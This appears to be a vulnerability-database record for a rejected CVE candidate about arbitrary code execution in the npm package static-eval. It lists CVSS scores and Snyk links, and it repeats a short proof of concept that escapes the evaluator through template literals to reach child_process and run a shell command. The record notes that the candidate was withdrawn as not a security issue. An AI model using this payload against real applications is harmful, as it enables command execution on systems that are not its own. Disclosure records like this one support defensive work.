** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)

** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

Snyk AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

https://github.com/browserify/static-eval/blob/master/index.js%23L180 [Broken Link]

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860 [Exploit, Third Party Advisory]

https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 [Exploit, Third Party Advisory]

NIST AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

NIST (AV:N/AC:L/Au:N/C:P/I:P/A:P)

NIST CWE-94

OR
     *cpe:2.3:a:static-eval_project:static-eval:*:*:*:*:*:node.js:*:*

https://github.com/browserify/static-eval/blob/master/index.js%23L180 No Types Assigned

https://github.com/browserify/static-eval/blob/master/index.js%23L180 Broken Link

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1071860 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 No Types Assigned

https://snyk.io/vuln/SNYK-JS-STATICEVAL-1056765 Exploit, Third Party Advisory

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals.

PoC:

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()"
var ast = parse(src).body[0].expression;
evaluate(ast)

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)